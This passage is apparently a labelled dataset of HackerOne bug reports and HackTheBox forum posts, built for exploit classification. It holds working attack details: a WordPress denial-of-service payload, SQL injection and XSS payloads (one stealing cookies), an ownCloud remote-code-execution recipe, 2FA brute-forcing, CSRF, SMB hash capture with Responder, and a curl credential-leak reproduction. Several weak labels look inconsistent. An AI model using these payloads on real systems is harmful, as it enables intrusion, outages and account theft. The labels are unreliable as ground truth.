\n```http\nwww.signalsciences.com/wp-admin/load-scripts.php?load=\n```\n**Steps To Reproduce:**\n\nOpen Vulnerability url - open directory /wp-admin/load-scripts.php?load=\nAdd parameter-vulnerable in request header\nIn request header using GET-Method\n\n**Payloads Vulnerabilities**\n```\neutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter\n```\n{F2237583}\n\n## Impact\n\nAttackers can use this vulnerable function to deplete server resources and launch denial of service attacks.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2018-6389"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "6e2f337ddc6c85e151b0", "text": "[Unknown] [Python]: JWT security-related queries\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d20622a7a024abd0df5b", "text": "[SQL Injection] SQL Injection in CVE Discovery Search\n\n**Summary:**\nUnsanitized user-controlled inputs in the CVE Discovery Search allow for SQL injection.\n\n**Description:**\nSearch terms are split on whitespace but no additional sanitization is applied, allowing arbitrary SQL statements, such as a blind or timing-based attack. \n\n### Steps To Reproduce\n\n1. Visit https://hackerone.com/intelligence/cve_discovery\n2. Enter a search term that normally returns results, plus an injection payload such as /**/AND/**/'1%'='1 and confirm that the results are still returned\n3. Change the payload to /**/AND/**/'1%'='0 and confirm that no results are returned\n\n### Optional: Your Environment (Browser version, Device, etc)\n\n * Chrome\n\n### Optional: Supporting Material/References (Screenshots)\n{F2211684}\n{F2211685}\n\n## Impact\n\nDisclosure of data in Analytics Database, including report, team, and asset data", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f572c07d34d379bc4c3d", "text": "[Improper Restriction of Authentication Attempts] Email Verification Bypass by bruteforcing when setting up 2FA\n\n## Summary:\nHello team, I hope you are fine and doing well\n\nwhen a user set ups his 2 Factor Authentication in his account and verify his email ,i was able to bruteforce the email verification process . \n\nThe confirmationCode is used for authentication of user's email and it can be brute forced. The code is only 6 digits long ,so it will not take much time to crack . (https://cloudnine.com/wp-content/uploads/2020/02/CrackPassword2.png)\n\nAfter the victim's email confirmation code gets verified , the user can then set up his personal phone to victim's email and the victim will never be able to sign inside his account as he does not get the otp received in the attakers phone.(due to 2 fa)\n\n## Steps To Reproduce:\n\n 1. Request a confirmationCode in your email , enter any code\n 2. Send this request to burpsuite intruder , and bruteforce the confirmationCode with any number of requests\n 3. Out of all the response , one response will have a length around 373 (only response whose length is lesser than others), thus proving that was the correct confirmation code.\n\n*Attackers Scenario*:\n\nAttacker creates a account using victim's email ABC@gmail.com , Now attacker setups the 2FA using brute force . Victim wants to join evernote , so he resets his password but he is unable to join since he does not have the 2FA codes . Thus he user is permanently unable to access evernote . It is a pre account takeover .\n\n## Impact\n\nThe victim who wants to log inside or use forget password to recover his/her account in evernote will be locked out forever. Attacker did a pre account takeover.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "376773f102cb33915902", "text": "[Cross-Site Request Forgery (CSRF)] CSRF - Modify User Settings with one click - Account TakeOver\n\n**Target Url**\nhttps://█████\n\n**Summary:**\nThis CSRF is sensitive, similar to the old one #799855 , here attacker can change user name, email, and password with just one click from user.\nI think its severity should be greater than Medium (High) since it doesn't require any user interaction but only just being authenticated to the target url.\n\n## Step-by-step Reproduction Instructions\n\n1. Login to your account.\n2. To generate the html code: You can click on save button in edit Profile section and intercept the request -> Engagement Tools -> Generate CSRF PoC.\n3. Copy and paste the generated code to html file \n```\n\n \n
\n \n \n \n \n \n
\n \n\n```\nOpen the file in browser, click the button and the profile info will be changed successfully.\n\n## Suggested Mitigation/Remediation Actions\nAdd a csrf-token in the header or in an hidden input to check if the user that is doing this action authorized or not.\n\n## Impact\n\nThis action is critical and sensitive. Attacker can upload this file to a url. Sends it to the victims. And when the authenticated victims navigate to the url their accounts details (username, email, password) will change.\nAttacker will undergo successful Account Takeover.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "681fe6867a0334c26820", "text": "[Code Injection] Remote Code Execution on ownCloud instances with ImageMagick installed\n\nIt is possible to execute code on ownCloud instances which have ImageMagick installed. This is due to the usage of ImageMagick for preview generation for some file types. (anything using [`OC\\Preview\\Bitmap`](https://github.com/owncloud/core/blob/83f600f8b89b62d52248dfdbc7046567be024b67/lib/private/Preview/Bitmap.php#L84-L92))\n\nThe prerequisite for exploitation seem to be:\n\n- ImageMagick is installed (e.g. as [described in the ownCloud documentation](https://doc.owncloud.com/server/10.10/admin_manual/installation/manual_installation/manual_imagick7.html))\n- The attacker knows the file path of a file that they uploaded (e.g. `/mnt/data/files/`)\n- The attacker is able to upload files to the system (e.g. by using [File Drop Folders](https://owncloud.com/features/file-drop-folders/) or having an account)\n\nTo reproduce we have provided the following files:\n\n- F2127559\n```\nFROM owncloud/server:10.11\nRUN apt-get update && apt-get install -y imagemagick\n```\n\n- F2127558\n```\n\n \n \n \n \n <?php echo php_uname(); ?>\n \n\n```\n\n- F2127557\n```\n\nxmlns=\"http://www.w3.org/2000/svg\"> \n\n\n```\n\nDownload these files and then perform the following steps:\n\n- Build the docker image\n - `docker build . -t owncloud-imagemagick`\n- Start the docker image\n - `docker run --rm --name oc-eval -d -p8080:8080 owncloud-imagemagick:latest`\n- Open the ownCloud instance at localhost:8080 and login using the username “admin” and the password “admin”.\n - Upload the file exploit.msl\n - Upload the file image.rgb\n- Reload the page, at this point you will be served the new rewritten index.php that will also perform the phpinfo() command. (you can change which file should be overwritten and what PHP code will be executed inside exploit.msl)\n\n{F2127565}\n\n## Impact\n\nAttackers that are able to upload files to a ownCloud instance with ImageMagick installed can execute arbitrary code on the system.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a2999e9311c899957e36", "text": "For anyone else who may be stuck troubleshooting. Here are some options to try, I was stuck too. Read through all 3, you may have missed one. A (yes I had to append one haha). If you put in the ip address into the browser and it wont let you see the unika.htb, you need to resolv the /etc/hosts file for the DNS server because the server is a server running HTB VM boxes, and they all share the same outgoing IP, so the domain name doesn’t know what ip to attach to. go into > cd /etc/hosts and add the ‘IPADDRESS (tab space) unika.htb’, aparently you will have to do this over and over for htb boxes when its a web server to view the page for more enumeration…I just wanted to use the word enumeration to sound smart. 1 Make sure the interface you use when you start Responder is the interface that is connected to the HTB box. For me it was openvpn, so tun0. 2 Also make sure you are connected to the HTB box in the same environment you are running Responder, I was using tools in my Kali VM, but running the openvpn connection on my mac, so couldn’t read the traffic. 3 Once responder is up and running properly ‘python3 Responder.py -I tun0’, then make sure when you enter the web browser address to add smb payload ‘ http://unika.htb/?page=//ipaddress/whatever ’, the IPADDRESS is NOT the Responder HTB server you used to nmap earlier, its the ipaddress connected to our openvpn connection!. You can check this with ifconfig in kali or linux, and see what tun0 ip is or JUST GO into the running responder listening and look at the responder IP address after the responder NIC line of code…make sure you use that in the web address attack with page= :). Hope this helps.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-12-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "43932b5133fef524db0b", "text": "What I did is after each change happen in rdx i coppied it and combine them and then used loader.py and put the hex values combined without the 0x and it worked.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-10-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4f46d14a7d896713792e", "text": "[Information Disclosure] Disclose STUFF member name and make actions.\n\nHello Shopify Security Team!\n\n Bug Summary:\n=============\n\nBased on the report #968165, this also can retrieve the STUFF member name and can send messages using his name.\n\n Reproduction steps:\n=============\n - install shopify chat applications.\n\nStart Exploit #1 : \n=============\n+ Go to targeted store : \n+ Start a chat using the app with the store support.\n+ Click on _I need an update on my order_.\n+ fill out the Order ID and Email. ( fill the info randomly if you want to), the respond comes with message \"in order to provide you with ....\".\n+ I intercept the the post request, and inject changes in the request, \n+ In this exploit allowed the attacker to send messages like a team member (bot)\n\n{F965084}\n\nExample : i changed text element to \" Hello customer hahaha \"\n\nResult : \n========\n\npoc from shopify ping application ( STUFF side )\n\n{F965081}\n\n\n Start Exploit #2 : \n=============\n+ Go to targeted store : \n+ Start a chat using the app with the store support.\n+ As soon as you get the answer.\n+ I intercept the message request, i found the STUFF member name and ID.\n\n{F965077}\n\n{F965078}\n\n## Impact\n\nCan retrive STUFF info, not allowed !", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "898e3d3e0ba6a0facca8", "text": "[Cross-site Scripting (XSS) - Reflected] xss reflected on imgur.com\n\nSteps to reproduce : \n- i log in to my account and navigate to see other profile\n- i intercept the request then click Give Emerald\n\n{F1115658}\n\nRequest look like : \n```\nPOST /account/v1/gifting/purchase?client_id=546c25a59c58ad7 HTTP/1.1\nHost: api.imgur.com\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0\nAccept: application/json\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://imgur.com/user/hermawanferdi\nContent-Type: application/json\nOrigin: https://imgur.com\nContent-Length: 311\nConnection: close\nCookie: postpagebeta=1; amplitude_id_f1fc2abcb6d136bd4ef338e7fc0b9d05imgur.com=eyJkZXZpY2VJZCI6ImM5YzdiYTIxLTAzMjgtNGJkZi05ZGQ2LTE4NDFmZTY2ZGI3Y1IiLCJ1c2VySWQiOiIxMTI1OTYxMzUiLCJvcHRPdXQiOmZhbHNlLCJzZXNzaW9uSWQiOjE2MDc5MjQxNTE0MDcsImxhc3RFdmVudFRpbWUiOjE2MDc5MjQ5NzA1ODQsImV2ZW50SWQiOjIwLCJpZGVudGlmeUlkIjozNiwic2VxdWVuY2VOdW1iZXIiOjU2fQ==; is_emerald=0; __qca=P0-164562980-1607924155407; is_authed=1; IMGURSESSION=6bc49554ae5b60f78f6928698819d0aa; SESSIONDATA=%7B%22sessionCount%22%3A1%2C%22sessionTime%22%3A1607924534647%7D; IMGURUIDJAFO=98a32f615768bd72bcfd89f450ea3f8c7a8b83db9647ade587ead48ace80048a; G_ENABLED_IDPS=google; authautologin=b63b9adee68e2e6ff10c0524995762d1%7EhtH5HkdxlstYng81Zq26XEEq7fv7IRra; accesstoken=095cd3db32693c0127c479dfda1fd563c776bdcd; _nc=1; postpagebetalogged=1; frontpagebetav2=1; pp=4807269994624293; fpb-roll=28.099570399611384; __asc=5812397c1765fc71d7f51cf98df; __auc=5812397c1765fc71d7f51cf98df; _ga=GA1.2.509004379.1607924653; _gid=GA1.2.206575419.1607924653; _fbp=fb.1.1607924654910.554323515\n\n{\"gifter_id\":112596135,\"recipient_id\":136516779,\"amount\":1,\"redirect_url\":\"https://imgur.com/emerald/give-emerald?username=hermawanferdi&redirect=https://imgur.com/user/hermawanferdi\",\"source\":\"User profiler\",\"source_url\":\"https://imgur.com/user/hermawanferdi\",\"anonymous\":true,\"post_id\":null,\"comment_id\":null}\n```\n\n- i notice \"redirect_url\":\"https://imgur.com/emerald/give-emerald?username=hermawanferdi&redirect=https://imgur.com/user/hermawanferdi\"\n- i copy the url and change the redirect parameter\n- i change the redirect parameter with payload xss \"javascript:alert(document.cookie)\"\n- i open the url on browser\n- xss alert\n\n{F1115659}\n\n## Impact\n\nreflected xss / xss attack", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7c07a90ca8fd611351d1", "text": "[Unknown] no rate limit in forgot password session\n\nA little bit about Rate Limit:\nA rate limiting algorithm is used to check if the user session (or IP-address) has to be limited based on the information in the session cache.\nIn case a client made too many requests within a given timeframe, HTTP-Servers can respond with status code 429: Too Many Requests.\n## Description:-\nI have identified that when Forgetting Password for account , the request has no rate limit which then can be used to loop through one request. Which can be annoying to the root users sending mass password to one email\n\nSteps To Reproduce The Issue\n\nsetp1 - clik this link = https://www.yelp.com/login?return_url=https://www.yelp.com/seeyousoon?fsid=iY6PnT2UYrAnv0ASZEs3oQ\n\nStep 2- Intercept This Request In Burp And Forward Till You Found Your Number In Request Like\n\nPOST /j/collect?v=1&_v=j97&aip=1&a=1720823427&t=event&ni=1&_s=9&dl=https%3A%2F%2Fwww.yelp.com%2Flogin%3Freturn_url%3Dhttps%3A%2F%2Fwww.yelp.com%2Fseeyousoon%3Ffsid%3DiY6PnT2UYrAnv0ASZEs3oQ&ul=en-us&de=UTF-8&dt=Log%20In%20-%20Yelp&sd=24-bit&sr=1920x940&vp=1910x753&je=0&ec=New%20Signup&ea=signup%20click&el=submit%20forgot%20password&_u=SICAAAABAAAAAC~&jid=215130607&gjid=774412709&cid=AF761EB18AB1E206&tid=UA-30501-24&_gid=232424112.1664351398&_r=1&z=1311429197 HTTP/2\nHost: www.google-analytics.com\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: text/plain\nContent-Length: 0\nOrigin: https://www.yelp.com\nReferer: https://www.yelp.com/\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: cross-site\nTe: trailers\nConnection: close\n\nStep 3- Now Send This Request To Intruder And Repeat It 100 Time By Fixing Any Arbitrary Payload Which Doesn't No Effect Request I Choose Accept-Language: en-US,en;q=0.$5$\n\nStep 4 - See You Will Get 200 ok Status Code & 100 + Email In Your INBOX\nSee It Is Resulting In Mass Mailing Or Email Bombing To Your Users Which Is Bad For Business Impact\n\n\nI Will Recommend You To Add A ReCaptcha & Sort Of Something Which Requires Manual Human Interaction To Proceed Like You Can Add Captcha Like 2+2=_ so that it cannot be brute forced and you also can have a limit at the backend for particular number upto 5 times a day user can request Forget Password Email or Link something like that will prevent you from someone exploiting this vulnerability\n\n## Impact\n\nIf You Are Using Any Email Service Software API Or Some Tool Which Costs You For Your Email This Type Of Attack Can Result You In Financial Lose And It Can Also Slow Down Your Services It Can Take Bulk Of Storage In Sent Mail Although If Users Are Affected By This Vulnerability They Can Stop Using Your Services Which Can Lead To Business Risk", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4143d5be2a15e66cfe66", "text": "[Cross-site Scripting (XSS) - Generic] XSS from Mastodon embeds\n\nBy default, the IRCCloud web client embeds Mastodon toots when a link to one is sent. Anyone can run a Mastodon server, and so the server from which toot data is fetched might be malicious. It is possible for an attacker to cause a web client user to execute arbitrary JavaScript in the context of the IRCCloud web client by tricking the web client into embedding a `javascript:` URL.\n\n**POC**:\n1. Ensure \"Embed social media links\" is enabled in settings under \"Chat & embeds\" (I think this is on by default)\n2. Send a message with a link to https://sm4.ca/@a/123456789012345678 (the link itself 404s but IRCCloud only tries to use Mastodon API so it doesn't matter)\n3. Wait a few seconds for the embed to load\n4. Look at your session cookie\n\nWhen the web client sees what looks like a toot URL, it tries to get canonical toot URL by making a query to `[domain]/api/v1/statuses/[toot ID]`. Here is what I serve at `https://sm4.ca/api/v1/statuses/123456789012345678`:\n\n```json\n{\n \"account\": {\n \"url\": \"https://sm4.ca/@a\"\n },\n \"url\": \"javascript:top.document.body.innerHTML = \\\"hi your cookie is \\\" + document.cookie;//\"\n}\n```\n\n(`.account.url` is only present because the web client ensures it matches the original link)\n\nThe web client creates an `iframe` using `.url` as the src, which in this case is a `javascript:` URL. The specified script runs in a seperate document that has access to its parent, and can access anything the parent can. The `//` is needed at the end since the web client appends `/embed` to the embed URL.\n\n(also apart from this particular issue, I don't think Mastodon embeds should be enabled unless \"Embed 3rd party image and video links\" is enabled since even when the Mastodon server isn't malicious your IP address is still leaked to an arbitrary server)\n\n## Impact\n\nAn attacker who can send a message to an web-client-using IRCCloud user can obtain their session token and act as them. By sending a message with a malicious URL to a large channel an attacker could compromise many users at once.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-10-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "092874f0bcdf69f7cf3a", "text": "Wow this was difficult. I finally got the flag. It was a lot more simple than I thought. I heard others get the flag with different methods but my method was relatively simple. 1.Find where to inject, intercept move request with burp. 2.Look for \" malicious request denied! message in response, that means you are injecting in the correct request . 3. Look for “ error ” in responses, they give valuable info about what is happening when you inject stuff. 4.It is possible to read the flag without uploading flag.txt to /tmp directory or anywhere else, you can read it straight from the Response message in burp repeater. 5.It is not necessary to use sub shells, encoding, reversing words or using case manipulation. 6.I personally injected after from=filename.txt HERE 7.The only techniques I used were “ bypassing blacklisted commands ” , “ bypassing blacklisted characters ” and “ bypassing space filters ”. I solved this challenge with information only from these three modules. 8.I looked and monitored error messages in responses which ultimately led to my success, I was failing because the injection parameter I was using worked only if the first command succeeded, I realized from response that the first command failed “Error while moving: mv: cannot stat 'var/www/html/files/2143214.txt : No such file or directory” and changed my injection parameter(from “Detection” lesson) and immediately was successful. Hope this helped. I spent 4 hours on this and did not stand up from the computer once Good luck!", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-11-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d038c3d9bde57efaf95a", "text": "[Cross-site Scripting (XSS) - Reflected] Reflected XSS | https://████████\n\nSummary\n\nHi team, there's a reflected XSS on https://████ using the `plot` param. There's a WAF in place but it's possible to bypass it.\nSteps to reproduce\n\n1. Click https://██████████/fcgi-bin/getplot.py?plot=aaa%3Ch1%20onauxclick=confirm(document.domain)%3ERIGHT%20CLICK%20HERE\n2. Observe the popup showing document.domain when right clicking \"RIGHT CLICK HERE\"\n\n███\n\n## Impact\n\nThe attacker can trigger remote code execution on the victim’s browser, and steal credentials, sessions, and potentially send malware to the victim.\n\n## System Host(s)\n██████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1. Click https://████████/fcgi-bin/getplot.py?plot=aaa%3Ch1%20onauxclick=confirm(document.domain)%3ERIGHT%20CLICK%20HERE\n2. Observe the popup showing document.domain when right clicking \"RIGHT CLICK HERE\"\n\n## Suggested Mitigation/Remediation Actions", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "04e72a9b5463017fdda5", "text": "I am still having issues with this. I wonder if somebody can give me another clue", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-04-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f8cd3666fdca297651af", "text": "I tried to follow your directions, but I keep getting “Folder is empty” in the File Manager using Burp Suite Repeater Here is what I tried (Spoiler) I tried both move and copy, url encoded ‘<<<’ (%3C%3C%3C), used to=tmp and without tmp. I’m not sure what I’m doing wrong. Spoiler", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-10-05", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ae4e9b1ca95d310e4f32", "text": "[Insufficiently Protected Credentials] Credential leak on redirect\n\n## Summary:\n[add summary of the vulnerability]\n\nCurl can be coaxed to leak user credentials to third-party host by issuing HTTP redirect , like the Proxy-Authorization 、x-auth-token header. It is a bypass of fix https://hackerone.com/reports/1547048 , CVE-2022-27776 .\n\n## Steps To Reproduce:\n[add details for how we can reproduce the issue]\n\n 1. Create a 302.php file, such as:\n```\n\n```\nAdd the 2 record in the /etc/hosts file: \n```\n127.0.0.1 a.com\n127.0.0.1 b.com\n```\n 2. curl -H \"Proxy-Authorization: secrettoken\" http://b.com/302.php -vv -L \nThe redirect will be followed, and the confidential headers sent over insecure HTTP to the specified port:\n```\n# curl -H \"Proxy-Authorization: secrettoken\" http://b.com/302.php -vv -L\n* Trying 127.0.0.1:80...\n* Connected to b.com (127.0.0.1) port 80 (#0)\n> GET /302.php HTTP/1.1\n> Host: b.com\n> User-Agent: curl/7.83.1\n> Accept: */*\n> Proxy-Authorization: secrettoken\n>\n* Mark bundle as not supporting multiuse\n< HTTP/1.1 302 Found\n< Date: Fri, 13 May 2022 11:22:06 GMT\n< Server: Apache/2.4.6 (CentOS) PHP/5.4.16\n< X-Powered-By: PHP/5.4.16\n< Location: http://a.com:8000\n< Content-Length: 0\n< Content-Type: text/html; charset=UTF-8\n<\n* Connection #0 to host b.com left intact\n* Clear auth, redirects to port from 80 to 8000\n* Issue another request to this URL: 'http://a.com:8000/'\n* Trying 127.0.0.1:8000...\n* Connected to a.com (127.0.0.1) port 8000 (#1)\n> GET / HTTP/1.1\n> Host: a.com:8000\n> User-Agent: curl/7.83.1\n> Accept: */*\n> Proxy-Authorization: secrettoken\n>\n```\n 3. curl -H \"x-auth-token: secrettoken\" http://b.com/302.php -vv -L \n```\n# curl -H \"x-auth-token: secrettoken\" http://b.com/302.php -vv -L\n* Trying 127.0.0.1:80...\n* Connected to b.com (127.0.0.1) port 80 (#0)\n> GET /302.php HTTP/1.1\n> Host: b.com\n> User-Agent: curl/7.83.1\n> Accept: */*\n> x-auth-token: secrettoken\n>\n* Mark bundle as not supporting multiuse\n< HTTP/1.1 302 Found\n< Date: Fri, 13 May 2022 11:24:15 GMT\n< Server: Apache/2.4.6 (CentOS) PHP/5.4.16\n< X-Powered-By: PHP/5.4.16\n< Location: http://a.com:8000\n< Content-Length: 0\n< Content-Type: text/html; charset=UTF-8\n<\n* Connection #0 to host b.com left intact\n* Clear auth, redirects to port from 80 to 8000\n* Issue another request to this URL: 'http://a.com:8000/'\n* Trying 127.0.0.1:8000...\n* Connected to a.com (127.0.0.1) port 8000 (#1)\n> GET / HTTP/1.1\n> Host: a.com:8000\n> User-Agent: curl/7.83.1\n> Accept: */*\n> x-auth-token: secrettoken\n```\n\nThe reason for the problem is that curl's filtering of authentication header header is incomplete. The Proxy-Authorization and x-auth-token headers are not considered, only restrict the delivery of Cookies and Authorization.\n\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\n\n * [attachment / reference]\nhttps://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/Proxy-Authorization\n\n## Impact\n\nLeak of Proxy-Authorization and x-auth-token headers.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-27776"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8996962da4d9f65088de", "text": "[Improper Access Control - Generic] Error in Booking an appointment reveals the full path of the website\n\nI figured out that when there is configuration of smtp then the user can reveal the full path of the website when booking an appointment.\n\n## Steps To Reproduce:\n\n1. Go to calendar and create and appointment.\n2. Now visit that appointment with burp proxy on.\n3. Select time and try to book the appointment.\n4. Following request will be observed\n```\nPOST /index.php/apps/calendar/appointment/9/book HTTP/1.1\nHost: localhost\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\nrequesttoken: \nContent-Length: 138\nOrigin: http://129.146.173.97\nDNT: 1\nConnection: close\nCookie:\n\n{\"start\":1674205200,\"end\":1674205500,\"displayName\":\"attackerbikram\",\"email\":\"ohp@gmail.com\",\"description\":\"\",\"timeZone\":\"UTC\"}\n```\n5. We will get following response\n```\nHTTP/1.1 500 Internal Server Error\nDate: Fri, 20 Jan 2023 03:25:36 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nPragma: no-cache\nCache-Control: no-cache, no-store, must-revalidate\nX-Request-Id: lETN8J5NgoiwfMPABX3g\nx-calendar-response: true\nContent-Security-Policy: default-src 'none';base-uri 'none';manifest-src 'self';frame-ancestors 'none'\nFeature-Policy: autoplay 'none';camera 'none';fullscreen 'none';geolocation 'none';microphone 'none';payment 'none'\nX-Robots-Tag: none\nReferrer-Policy: no-referrer\nX-Content-Type-Options: nosniff\nX-Frame-Options: SAMEORIGIN\nX-Permitted-Cross-Domain-Policies: none\nX-XSS-Protection: 1; mode=block\nContent-Length: 4472\nConnection: close\nContent-Type: application/json; charset=utf-8\n\n{\"status\":\"error\",\"message\":\"Could not send mail: Connection could not be established with host 127.0.0.1 :stream_socket_client(): Unable to connect to 127.0.0.1:25 (Connection refused)\",\"data\":{\"type\":\"OCA\\\\Calendar\\\\Exception\\\\ServiceException\",\"message\":\"Could not send mail: Connection could not be established with host 127.0.0.1 :stream_socket_client(): Unable to connect to 127.0.0.1:25 (Connection refused)\",\"code\":0,\"trace\":[{\"file\":\"\\/var\\/snap\\/nextcloud\\/33060\\/nextcloud\\/extra-apps\\/calendar\\/lib\\/Service\\/Appointments\\/BookingService.php\",\"line\":159,\"function\":\"sendConfirmationEmail\",\"class\":\"OCA\\\\Calendar\\\\Service\\\\Appointments\\\\MailService\"},{\"file\":\"\\/var\\/snap\\/nextcloud\\/33060\\/nextcloud\\/extra-apps\\/calendar\\/lib\\/Controller\\/BookingController.php\",\"line\":185,\"function\":\"book\",\"class\":\"OCA\\\\Calendar\\\\Service\\\\Appointments\\\\BookingService\"},{\"file\":\"\\/snap\\/nextcloud\\/33060\\/htdocs\\/lib\\/private\\/AppFramework\\/Http\\/Dispatcher.php\",\"line\":225,\"function\":\"bookSlot\",\"class\":\"OCA\\\\Calendar\\\\Controller\\\\BookingController\"},{\"file\":\"\\/snap\\/nextcloud\\/33060\\/htdocs\\/lib\\/private\\/AppFramework\\/Http\\/Dispatcher.php\",\"line\":133,\"function\":\"executeController\",\"class\":\"OC\\\\AppFramework\\\\Http\\\\Dispatcher\"},{\"file\":\"\\/snap\\/nextcloud\\/33060\\/htdocs\\/lib\\/private\\/AppFramework\\/App.php\",\"line\":172,\"function\":\"dispatch\",\"class\":\"OC\\\\AppFramework\\\\Http\\\\Dispatcher\"},{\"file\":\"\\/snap